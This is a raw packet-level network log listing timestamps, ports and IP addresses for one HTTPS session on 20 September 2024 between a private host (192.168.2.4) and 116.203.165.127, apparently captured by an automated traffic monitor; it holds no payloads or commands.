Sep 20, 2024 11:07:50.328778028 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.333420992 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.333455086 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.333501101 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.333514929 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.333525896 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.333549023 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.351995945 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.352027893 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.352214098 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.352229118 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.352272034 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.367091894 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.367119074 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.367208958 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.367224932 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.367279053 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.367834091 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.367855072 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.367893934 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.367902994 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.367927074 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.367944002 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.377703905 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.377748013 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.377787113 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.377800941 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.377811909 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.377834082 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.385759115 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.385801077 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.385838032 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.385850906 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.385881901 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.385893106 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.402312994 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.402354956 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.402451038 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.402473927 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.402513027 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.402523994 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.417388916 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.417445898 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.417536974 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.417551994 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.417587996 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.420533895 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.420593023 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.420627117 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.420638084 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.420648098 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.420694113 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.441569090 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.441610098 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.441689968 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.441706896 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.441751003 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.453577995 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.453613997 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.453712940 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.453727007 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.453764915 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.455246925 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.455285072 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.455364943 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.455374956 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.455416918 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.466609001 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.466649055 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.466725111 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.466742992 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.466779947 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.473423958 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.473452091 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.473563910 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.473584890 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.473704100 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.489475965 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.489527941 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.489736080 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.489752054 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.489793062 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.504487991 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.504549026 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.504606962 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.504616976 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.504641056 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.504654884 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.507467985 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.507522106 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.507558107 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.507565022 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.507587910 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.507601023 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.529099941 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.529146910 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.529403925 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.529418945 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.529462099 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.542171001 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.542212009 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.542279005 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.542290926 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.542342901 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.543674946 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.543714046 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.543755054 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.543762922 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.543777943 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.543798923 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.553739071 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.553786039 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.553828001 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.553836107 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.553858042 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.553872108 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.560064077 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.560094118 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.560141087 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.560152054 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.560173035 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.560192108 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.576339006 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.576380014 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.576421976 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.576436043 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.576455116 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.576492071 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.591250896 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.591306925 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.591345072 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.591361046 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.591372013 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.591397047 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.594516993 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.594563007 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.594590902 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.594598055 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.594619989 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.594640970 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.616067886 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.616090059 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.616183043 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.616198063 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.616235971 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.629493952 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.629515886 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.629570007 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.629580975 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.629625082 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.629640102 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.630868912 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.630891085 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.630932093 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.630939960 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.630968094 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.630984068 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.642693043 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.642714024 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.642759085 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.642769098 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.642796993 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.642817974 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.647231102 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.647252083 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.647305012 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.647311926 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.647339106 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.647356987 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.662974119 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.663002968 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.663045883 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.663054943 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.663080931 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.663100958 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.681302071 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.681349993 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.681417942 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.681428909 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.681461096 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.681478024 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.681564093 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.681612968 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.681639910 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.681647062 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.681667089 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.681684971 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.703577995 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.703620911 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.703665972 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.703677893 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.703689098 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.703711033 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.716358900 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.716403008 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.716433048 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.716442108 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.716469049 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.716483116 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.717745066 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.717791080 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.717817068 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.717824936 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.717845917 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.717864990 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.729989052 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.730031967 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.730087042 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.730098963 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.730122089 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.730140924 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.734344959 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.734388113 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.734421968 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.734435081 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.734457016 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.734471083 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.752185106 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.752230883 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.752300024 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.752315044 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.752353907 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.765171051 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.765194893 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.765227079 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.765237093 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.765274048 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.768640995 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.768666029 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.768712997 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.768723011 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.768749952 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.768768072 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.789954901 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.790011883 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.790056944 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.790067911 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.790108919 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.790138006 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.803086042 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.803131104 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.803173065 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.803183079 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.803210020 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.803229094 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.804872990 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.804918051 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.804939985 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.804948092 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.804963112 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.804980040 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.817954063 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.817997932 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.818025112 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.818036079 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.818104029 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.821216106 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.821271896 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.821321011 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.821331024 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.821378946 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.841962099 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.842005014 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.842036009 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.842046976 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.842066050 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.842089891 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.860455990 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.860502005 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.860558033 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.860569000 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.860583067 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.860605001 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.892750025 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.892781973 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.892882109 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.892894983 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.892935038 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.893310070 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.893331051 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.893367052 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.893373966 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.893402100 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.893419981 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.894217014 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.894244909 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.894285917 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.894294024 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.894315004 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.894330978 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.895896912 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.895917892 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.895970106 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.895977974 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.895988941 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.896013975 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.904589891 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.904628992 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.904679060 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.904690027 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.904705048 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.904726028 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.913047075 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.913100958 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.913124084 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.913135052 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.913157940 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.913180113 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.928966999 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.929013014 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.929045916 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.929058075 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.929074049 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.929094076 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.947304964 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.947351933 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.947510958 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.947510958 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.947525978 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.947561979 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.980969906 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981045008 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981106043 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981118917 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981152058 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981157064 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981168032 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981189013 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981209040 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981237888 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981245041 CEST	443	49754	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:50.981293917 CEST	49754	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:50.981786013 CEST	443	49754	116.203.165.127	192.168.2.4
